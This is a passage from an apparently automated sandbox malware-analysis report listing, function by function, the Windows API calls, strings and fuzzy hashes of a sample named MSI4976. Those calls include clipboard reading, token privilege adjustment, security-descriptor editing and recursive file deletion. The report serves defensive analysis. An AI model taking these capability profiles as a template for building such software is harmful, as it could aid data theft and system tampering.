                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 1867810238-1173974218
                                        • Opcode ID: b3de98d80e50c9d0e896824f823a3486f5083da6449cd25fd654d1178e76f314
                                        • Instruction ID: aa27d47d25db677051d8301b872903491389b8738943d7420797570138e2ce7a
                                        • Opcode Fuzzy Hash: b3de98d80e50c9d0e896824f823a3486f5083da6449cd25fd654d1178e76f314
                                        • Instruction Fuzzy Hash: 4051537290415CAADF22EBA0DC85EDE77BCAF09344F4485D6E54AE7041DB319B88CF61
                                        Function 00377099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32(003BDBF0), ref: 003770C3
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 003770D1
                                        • GetClipboardData.USER32(0000000D), ref: 003770D9
                                        • CloseClipboard.USER32 ref: 003770E5
                                        • GlobalLock.KERNEL32(00000000), ref: 00377101
                                        • CloseClipboard.USER32 ref: 0037710B
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00377120
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0037712D
                                        • GetClipboardData.USER32(00000001), ref: 00377135
                                        • GlobalLock.KERNEL32(00000000), ref: 00377142
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00377176
                                        • CloseClipboard.USER32 ref: 00377283
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                        • String ID:
                                        • API String ID: 3222323430-0
                                        • Opcode ID: 1acdf0e7a745ed3c87c6f589a04de7c5bbe89c4f861c188344ca52ecafe7eca9
                                        • Instruction ID: 921f15950cff6a84330da559c2ce62d3d88b33b57d26490aa22fb3a12f6ff01a
                                        • Opcode Fuzzy Hash: 1acdf0e7a745ed3c87c6f589a04de7c5bbe89c4f861c188344ca52ecafe7eca9
                                        • Instruction Fuzzy Hash: 5A51B4312082016BD323EF60DC49F6E77ACAB85B00F418519F55AD65E1DF74D904DB62
                                        Function 0035B9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0035BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0035BF0F
                                          • Part of subcall function 0035BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0035BF3C
                                          • Part of subcall function 0035BEC3: GetLastError.KERNEL32 ref: 0035BF49
                                        • _memset.LIBCMT ref: 0035BA34
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0035BA86
                                        • CloseHandle.KERNEL32(?), ref: 0035BA97
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0035BAAE
                                        • GetProcessWindowStation.USER32 ref: 0035BAC7
                                        • SetProcessWindowStation.USER32(00000000), ref: 0035BAD1
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0035BAEB
                                          • Part of subcall function 0035B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0035B8C5
                                          • Part of subcall function 0035B8B0: CloseHandle.KERNEL32(?), ref: 0035B8D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                        • String ID: $default$winsta0
                                        • API String ID: 2063423040-1027155976
                                        • Opcode ID: ede637b385c090d40f7ebc795c6dc81ab59e5341abff7f69e300997fcba7b3a9
                                        • Instruction ID: 0163bcc80e147f12d572ad29d6e661fc04d6ce2931b5122a4281d0c054a136a4
                                        • Opcode Fuzzy Hash: ede637b385c090d40f7ebc795c6dc81ab59e5341abff7f69e300997fcba7b3a9
                                        • Instruction Fuzzy Hash: 70815571800208AFDF129FA4CD85EEEBBBCEF09305F154119FD55AA171DB318E199B20
                                        Function 00372044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00372065
                                        • _wcscmp.LIBCMT ref: 0037207A
                                        • _wcscmp.LIBCMT ref: 00372091
                                        • GetFileAttributesW.KERNEL32(?), ref: 003720A3
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 003720BD
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003720D5
                                        • FindClose.KERNEL32(00000000), ref: 003720E0
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003720FC
                                        • _wcscmp.LIBCMT ref: 00372123
                                        • _wcscmp.LIBCMT ref: 0037213A
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0037214C
                                        • SetCurrentDirectoryW.KERNEL32(003D3A68), ref: 0037216A
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00372174
                                        • FindClose.KERNEL32(00000000), ref: 00372181
                                        • FindClose.KERNEL32(00000000), ref: 00372191
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1803514871-438819550
                                        • Opcode ID: 039ddc718b93cf15d694a262b3a8bce1acce91ec6e97a8dce557019c3d6305b1
                                        • Instruction ID: 561c8c3281442d044e1733762b80232a29660c950dff40eee504f7a5dab7f9ae
                                        • Opcode Fuzzy Hash: 039ddc718b93cf15d694a262b3a8bce1acce91ec6e97a8dce557019c3d6305b1
                                        • Instruction Fuzzy Hash: 9131A4326002197ADF22DBA4EC48EDF77ACAF0A360F508556F915E7190DB78DE44CB61
                                        Function 0038F122 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 178windowfilenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • DragQueryPoint.SHELL32(?,?), ref: 0038F14B
                                          • Part of subcall function 0038D5EE: ClientToScreen.USER32(?,?), ref: 0038D617
                                          • Part of subcall function 0038D5EE: GetWindowRect.USER32(?,?), ref: 0038D68D
                                          • Part of subcall function 0038D5EE: PtInRect.USER32(?,?,0038EB2C), ref: 0038D69D
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0038F1B4
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0038F1BF
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0038F1E2
                                        • _wcscat.LIBCMT ref: 0038F212
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0038F229
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0038F242
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0038F259
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0038F27B
                                        • DragFinish.SHELL32(?), ref: 0038F282
                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0038F36D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                        • API String ID: 2166380349-762882726
                                        • Opcode ID: c1ea451c264641c5a39c8329f8424fd9bca7a42f2d9e9129b04485c85cbb5807
                                        • Instruction ID: 52cff6a467532f472abb21251f4fa1d0d60e571b4fdd50ec01e1949955fc1002
                                        • Opcode Fuzzy Hash: c1ea451c264641c5a39c8329f8424fd9bca7a42f2d9e9129b04485c85cbb5807
                                        • Instruction Fuzzy Hash: AC614972508300AFC712EF64EC85D9FBBF8BF89710F400A2EF595961A1DB709A05CB62
                                        Function 0037219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 003721C0
                                        • _wcscmp.LIBCMT ref: 003721D5
                                        • _wcscmp.LIBCMT ref: 003721EC
                                          • Part of subcall function 00367606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00367621
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0037221B
                                        • FindClose.KERNEL32(00000000), ref: 00372226
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00372242
                                        • _wcscmp.LIBCMT ref: 00372269
                                        • _wcscmp.LIBCMT ref: 00372280
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00372292
                                        • SetCurrentDirectoryW.KERNEL32(003D3A68), ref: 003722B0
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003722BA
                                        • FindClose.KERNEL32(00000000), ref: 003722C7
                                        • FindClose.KERNEL32(00000000), ref: 003722D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 1824444939-438819550
                                        • Opcode ID: ae5438af081b438936413e4c76a3bcfb87b5ed70fe89acca1e7d3cd38ae641ee
                                        • Instruction ID: 1d9f1f842a60f3905baa200fa5ef33d20104bf5b24e9ed653cb78b02bb518022
                                        • Opcode Fuzzy Hash: ae5438af081b438936413e4c76a3bcfb87b5ed70fe89acca1e7d3cd38ae641ee
                                        • Instruction Fuzzy Hash: 2C31F6326002196ACF62DBA4EC48EDF73AC9F05320F118956F915A6191E774DE85CB64
                                        Function 00326BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove_memset
                                        • String ID: Q\E$[$\$\$\$]$^
                                        • API String ID: 3555123492-286096704
                                        • Opcode ID: 70b7766c1bbcc6aff966500a5613486cf16e44e3b6e41af702cfa1936e9302c5
                                        • Instruction ID: 3350efd3538741c3cb9d375e53c716eaaf0d5a5f8e091493b4a9efb024d264d9
                                        • Opcode Fuzzy Hash: 70b7766c1bbcc6aff966500a5613486cf16e44e3b6e41af702cfa1936e9302c5
                                        • Instruction Fuzzy Hash: B272DE71D04229CFDF2ACF98C9816ADB7B1FF45314F2581A9D855AB381E334AE81DB90
                                        Function 0038ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0038ED0C
                                        • GetFocus.USER32 ref: 0038ED1C
                                        • GetDlgCtrlID.USER32(00000000), ref: 0038ED27
                                        • _memset.LIBCMT ref: 0038EE52
                                        • GetMenuItemInfoW.USER32 ref: 0038EE7D
                                        • GetMenuItemCount.USER32(00000000), ref: 0038EE9D
                                        • GetMenuItemID.USER32(?,00000000), ref: 0038EEB0
                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0038EEE4
                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0038EF2C
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0038EF64
                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0038EF99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                        • String ID: 0
                                        • API String ID: 3616455698-4108050209
                                        • Opcode ID: 93345fbcf1d016b20020d4814328e98b313b3ada265785b511973b9ec1c0c6ed
                                        • Instruction ID: 0ced3a7ab226742315f211e00edfdb737c69724e49c6f7a44ac9ebf2dc3b1859
                                        • Opcode Fuzzy Hash: 93345fbcf1d016b20020d4814328e98b313b3ada265785b511973b9ec1c0c6ed
                                        • Instruction Fuzzy Hash: 3F81C371608311AFD712EF14C884AAFBBE8FF89354F0109ADFA959B291D730E905CB52
                                        Function 0035B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0035B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0035B903
                                          • Part of subcall function 0035B8E7: GetLastError.KERNEL32(?,0035B3CB,?,?,?), ref: 0035B90D
                                          • Part of subcall function 0035B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0035B3CB,?,?,?), ref: 0035B91C
                                          • Part of subcall function 0035B8E7: RtlAllocateHeap.NTDLL(00000000,?,0035B3CB), ref: 0035B923
                                          • Part of subcall function 0035B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0035B93A
                                          • Part of subcall function 0035B982: GetProcessHeap.KERNEL32(00000008,0035B3E1,00000000,00000000,?,0035B3E1,?), ref: 0035B98E
                                          • Part of subcall function 0035B982: RtlAllocateHeap.NTDLL(00000000,?,0035B3E1), ref: 0035B995
                                          • Part of subcall function 0035B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0035B3E1,?), ref: 0035B9A6
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0035B3FC
                                        • _memset.LIBCMT ref: 0035B411
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0035B430
                                        • GetLengthSid.ADVAPI32(?), ref: 0035B441
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0035B47E
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0035B49A
                                        • GetLengthSid.ADVAPI32(?), ref: 0035B4B7
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0035B4C6
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0035B4CD
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0035B4EE
                                        • CopySid.ADVAPI32(00000000), ref: 0035B4F5
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0035B526
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0035B54C
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0035B560
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 2347767575-0
                                        • Opcode ID: ac10b8f56165ac3c2978533750005b98a33ea324b39f66bf42052fdb716094b0
                                        • Instruction ID: 240b5a2c92c9a34b4deceeceb836068e980b1bc67ee2f88e4e659ece47ced76e
                                        • Opcode Fuzzy Hash: ac10b8f56165ac3c2978533750005b98a33ea324b39f66bf42052fdb716094b0
                                        • Instruction Fuzzy Hash: 39515D71900209AFDF16DFA5DC45EEEBB79FF05301F048519F916AB2A1D7349A09CB60
                                        Function 00366E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003231DA
                                          • Part of subcall function 00367C0C: GetFileAttributesW.KERNEL32(?,00366A7B), ref: 00367C0D
                                        • _wcscat.LIBCMT ref: 00366E7E
                                        • __wsplitpath.LIBCMT ref: 00366E99
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00366EAE
                                        • _wcscpy.LIBCMT ref: 00366EDD
                                        • _wcscat.LIBCMT ref: 00366EEF
                                        • _wcscat.LIBCMT ref: 00366F01
                                        • DeleteFileW.KERNEL32(?), ref: 00366F0E
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00366F22
                                        • FindClose.KERNEL32(00000000), ref: 00366F3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                        • String ID: \*.*
                                        • API String ID: 2643075503-1173974218
                                        • Opcode ID: 2d63cb01f6baaa611831e3950f429881435efcc5a9201897da430640c7804e48
                                        • Instruction ID: ae26a58a43db22c1c7ee487d28f309580b04da532338fa29214990f48c878ca4
                                        • Opcode Fuzzy Hash: 2d63cb01f6baaa611831e3950f429881435efcc5a9201897da430640c7804e48
                                        • Instruction Fuzzy Hash: 5E21C172408344AAC612EBA0D8859DBBBDCAF99354F448E1AF5D5C7042EB31E64D87A2
                                        Function 00377294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        • Opcode ID: 97a8c810ec6a0cfff13533146d5e029576a0c1ce998f9ec01f7487a66266c399
                                        • Instruction ID: 65cc95186e040cb49ea7511ca67654a138392d02f722d734071f35f0caf59d99
                                        • Opcode Fuzzy Hash: 97a8c810ec6a0cfff13533146d5e029576a0c1ce998f9ec01f7487a66266c399
                                        • Instruction Fuzzy Hash: 09219F35704210AFEB22AF24DC59B6E7BACEF45710F00801AF94A9B2A1DB35ED419B90
                                        Function 0038EAA6 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 149nativewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                          • Part of subcall function 0033B736: GetCursorPos.USER32(000000FF), ref: 0033B749
                                          • Part of subcall function 0033B736: ScreenToClient.USER32(00000000,000000FF), ref: 0033B766
                                          • Part of subcall function 0033B736: GetAsyncKeyState.USER32(00000001), ref: 0033B78B
                                          • Part of subcall function 0033B736: GetAsyncKeyState.USER32(00000002), ref: 0033B799
                                        • ReleaseCapture.USER32 ref: 0038EB1A
                                        • SetWindowTextW.USER32(?,00000000), ref: 0038EBC2
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0038EBD5
                                        • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0038ECAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
